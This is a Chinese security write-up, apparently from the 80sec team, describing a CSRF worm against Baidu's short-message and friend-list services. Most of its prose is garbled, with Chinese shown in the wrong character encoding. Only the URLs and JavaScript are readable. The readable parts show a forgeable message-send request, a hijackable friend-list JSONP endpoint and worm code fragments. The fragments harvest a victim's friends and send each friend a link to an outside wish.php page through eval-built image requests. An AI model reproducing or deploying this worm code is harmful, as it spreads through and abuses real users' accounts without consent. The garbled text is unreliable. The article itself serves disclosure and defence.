º|¬}°_¦]¡G¦Ê«×¬O°ê¤º³Ì¤jªº¤¤¤å·j¯Á¤ÞÀº¡C¦P®É¦Ê«×¤]´£¨Ñ¤F¦Ê«×ªÅ¶¡¡B¦Ê«×¶K§aµ¥BLOGªÀ°ÏªA°È¡A¾Ö¦³®ü¶qªº¥Î¤á¸s¡A¸¹ºÙ¥þ²y³Ì¤j¤¤¤åªÀ°Ï¡C80secµo²{¹L¦Ê«×²£«~¤@«Y¦Cªº¦w¥þº|¬}¡A¨ä¤¤¤@¨Ç°ÝÃD±o¨ì¤F¦³®Äªº×¸É¡A¦ý¬O¦Ê«×ªº²£«~¤´µM¦s¦b«Ü¦hÄY«ªº¦w¥þº|¬}¡A§Q¥Î³o¨Çº|¬}¶Â«È¥i¥H¨î§@WebįÂΡA¼vÅT¦Ê«×©Ò¦³ªº¥Î¤á¡C
CSRF worm§Þ³N¤ÀªR¡G
¤@. ¦Ê«×¥Î¤á¤¤¤ßµu®ø®§¥\¯à¦s¦bCSRFº|¬}
¦Ê«×¥Î¤á¤¤¤ßµu®ø®§¥\¯à©M¦Ê«×ªÅ¶¡¡B¦Ê«×¶K§aµ¥²£«~¬Û¤¬ÃöÁp¡A¥Î¤á¥i¥Hµ¹«ü©w¦Ê«×ID¥Î¤áµo°eµu®ø®§¡A¦b¦Ê«×ªÅ¶¡¥Î¤¬¬°¦n¤Íªº±¡ªp¤U¡Aµo°eµu®ø®§±N¨S¦³¥ô¦ó¨î¡A¦P®É¥Ñ©ó¦Ê«×µ{§Çû¦b¹ê²{µu®ø®§¥\¯à®É¨Ï¥Î¤F$_REQUESTÃþÅܶq¶Ç°Ñ¡Aµ¹¶Â«È§Q¥ÎCSRFº|¬}¶i¦æ§ðÀ»´£¨Ñ¤F«Ü¤jªº¤è«K¡C¦Ê«×¥Î¤á¤¤¤ßµu®ø®§¥\¯àªº½Ð¨D°Ñ¼Æ¯à°÷³Q§¹¥þ¹w´ú¡A¥u»Ýn«ü©wsn°Ñ¼Æ¬°µo°e®ø®§ªº¥Î¤á¡Aco°Ñ¼Æ¬°®ø®§¤º®e¡A´N¥i¥H¦¨¥\µo°eµu®ø®§¡A¦p¤U¡G
http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn=¥Î¤á½ã¸¹&co=®ø®§¤º®e
¸Óº|¬}¦b07¦~³QÀ³¥Î©ó80SEC´ú¸Õªº¦Ê«×XSS WORM¤¤¡A¦Ü¤µ©|¥¼×¸É¡C
¤G. ¦Ê«×ªÅ¶¡¦n¤Íjson¼Æ¾ÚªnÅS°ÝÃD
¦Ê«×ªÅ¶¡ªº¦n¤Í¥\¯à¼Æ¾Ú¬O¨Ï¥Îjson®æ¦¡¹ê²{ªº¡A¦¹±µ¤f¨S¦³°µ¥ô¦óªº¦w¥þ¨î¡A¥u»Ý±Nun°Ñ¼Æ³]©w¬°¥ô·N¥Î¤á½ã¸¹¡A´N¥i¥HÀò±o«ü©w¥Î¤áªº¦Ê«×¦n¤Í¼Æ¾Ú¡A¦p¤U
http://frd.baidu.com/?ct=28&un=¥Î¤á½ã¸¹&cm=FriList&tn=bmABCFriList&callback=gotfriends
¸Óº|¬}¥i¥Hª½±µ³QJavascript§T«ù§Þ³N§Q¥Î¡AÀò¨ú¥Î¤áªº¦n¤Í«H®§.
¤T. ¦Ê«×»{ÃÒ°ÝÃD
web§ðÀ»¤£¥iÁ×§K¦a¨Ì¿à©ó«Y²Îªº»{ÃÒ¡A¦Ó¦b¦Ê«×ªº»{ÃÒ«Y²ÎùØ¡A©Ò¦³»{ÃÒ°ò©óSESSION¡A³o¼Ë¦bIEùØ´N¤£·|³QIEªºÁô¨pµ¦²¤ªý¤î¡A·|¸Ü»{ÃÒ«H®§¨C¦¸³£·|³Qµo°e¥X¥h¡A¬°§ÚÌįÂΪº¶Ç¼½´£¨Ñ¤F¥²nªº±ø¥ó¡C
¥|. CSRF + JavaScript_Hijacking + Session Auth= CSRF worm
CSRF§ðÀ»µ²¦XJavascript§T«ù§Þ³N§¹¥þ¥i¥H¹ê²{CSRF worm¡A¦Ê«×²£«~ªº³o¨âÓ¦w¥þ°ÝÃD¬°¹ê²{WebįÂδ£¨Ñ¤F©Ò¦³ªº±ø¥ó¡A80Sec¹Î¶¤¤w¸g½s¼g¥X¤@¥u§¹¾ãªº¦Ê«×csrfįÂΡA³o¬O¤@¥u§¹¥þ¥Ñ«È¤áºÝ¸}¥»¹ê²{ªºCSRFįÂΡA³o¥uįÂιê»Ú¤W¥u¦³¤@±øÃì±µ¡A¨ü®`ªÌÂIÀ»³o±øÃì±µ«á¡A±N·|¦Û°Ê§â³o±øÃì±µ³q¹Lµu®ø®§¥\¯à¶Çµ¹¨ü®`ªÌ©Ò¦³ªº¦n¤Í¡A¦]¬°¦Ê«×¥Î¤á°ò¼Æ«Ü¤j¡A©Ò¥HįÂΪº¶Ç¼½³t«×±N·|§e´X¦ó¯Å¦¨ªø¡A¤U±¹ïcsrfįÂγ¡¤À¥N½X¶i¦æ¤ÀªR¡G
1. ¼ÒÀÀªA°ÈºÝ¨ú±orequestªº°Ñ¼Æ
var lsURL=window.location.href;
loU = lsURL.split(”?”);
if (loU.length>1)
{
var loallPm = loU[1].split(”&”);
¬Ù²¤…………….
©w¸qįÂ汪A°È¾¹¦a§}¡A¨ú±o?©M&²Å¸¹«áªº¦r²Å¦ê¡A±qURL¤¤´£¨ú±o·P¬VįÂΪº¥Î¤á¦W©M·P¬VįÂΪ̪º¦n¤Í¥Î¤á¦W¡C
2. ¦n¤Íjson¼Æ¾Úªº°ÊºAÀò¨ú
var gotfriends = function (x)
{
for(i=0;i<x[2].length;i++)
{
friends.push(x[2][i][1]);
}
}
loadjson(’<script src=”http://frd.baidu.com/?ct=28&un=’+lusername+’&cm=FriList&tn=bmABCFriList&callback=gotfriends&.tmp=&1=2″><\/script>’);
³q¹LCSRFº|¬}±q»·µ{¥[¸ü¨ü®`ªÌªº¦n¤Íjson¼Æ¾Ú¡A®Ú¾Ú¸Ó±µ¤fªºjson¼Æ¾Ú®æ¦¡¡A´£¨ú¦n¤Í¼Æ¾Ú¬°Ä¯ÂΪº¶Ç¼½¬yµ{°µ·Ç³Æ¡C
3. ·P¬V«H®§¿é¥X©M®ø®§µo°eªº®Ö¤ß³¡¤À
evilurl=url+”/wish.php?from=”+lusername+”&to=”;
sendmsg=”http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn=[user]&co=[evilmsg]”
for(i=0;i<friends.length;i++){
¬Ù²¤…………….
mysendmsg=mysendmsg+”&”+i;
eval(’x'+i+’=new Image();x’+i+’.src=unescape(”‘+mysendmsg+’”);’);
¬Ù²¤…………….
¾ãÓįÂγ̮֤ߪº³¡¤À¡A«ö·ÓįÂηP¬VªºÅÞ¿è¡A±N·P¬VªÌ¥Î¤á¦W©M»Ýn¶Ç¼½ªº¦n¤Í¥Î¤á¦W©ñ¨ìįÂÎÃì±µ¤º¡A³Ì«á¿é¥Xµu®ø®§¤º®e¡A¨Ï¥Î¤@ÓFOR´`Àôµ²ºc¾ú¹M©Ò¦³¦n¤Í¼Æ¾Ú¡A³q¹L¹Ï¤ù¤å¥ó½Ð¨D¦V©Ò¦³ªº¦n¤Íµo°e·P¬VÃì±µ«H®§¡C
4. ª`·N²Ó¸`
¥Ñ©ó»Ýn°ÊºA¥[¸üjson¼Æ¾Ú¹B¦æ¡A©Ò¥H¥²¶·ª`·N¦UÓ¨ç¼Æ°õ¦æªº¥ý«á¶¶§Ç¡A§_«hjson¼Æ¾ÚÁÙ¥¼¥[¸ü§¹²¦¡AįÂή֤߳¡¤Àªº¬yµ{±N¶]¤£°_¨Ó¡C
5. CSRF Worm DEMO¶
³oùاÚÌ´£¨Ñ¤F¤@Ӧʫ×CSRF Worm DEMO¶¶È¨Ñ¤j®a¶i¦æ¦w¥þ´ú¸Õ¡A«D¦w¥þ´ú¸Õªº¨ä¥L¦æ¬°¡A80SEC±N¤£t¥ô¦ó³d¥ô¡C´ú¸Õ¤èªk¡G
±Nto°Ñ¼Æ³]¸m¬°¦Û¤vªº¥Î¤á¦W¡Aµn³°¦Ê«×«áÂIÀ»Ãì±µ©Îª½±µ¶i¤J¶±
http://www.80sec.com/wish.php?to=¦Û¤vªº¦Ê«×¥Î¤á¦W
¤ CSRF worm¦w¥þ´£¿ô:
°£¶}¦Ê«×¡A°ê¤ºªºªÀ°ÏÃþ¡BWeb2.0Ãþºô¯¸¦p®Õ¤ººô¡BMyspace¡B¶º§_µ¥³£¦s¦b³oÃþ¦w¥þ°ÝÃD¡A¶Â«È¥i¥Hª½±µ³q¹LCSRF§ðÀ»°t¦X¦UºØ¥\¯àÀ³¥Î°w¹ïºô¯¸¶i¦æCSRF worm§ðÀ»¡Aºô¯¸¥i¥H°Ñ¦Òhttp://www.80sec.com/csrf-securit.html¤åÀɤ¤ªº¦w¥þ´£¿ô°µ¶i¤@¨Bªº¨¾½d¡C

RSSq¾\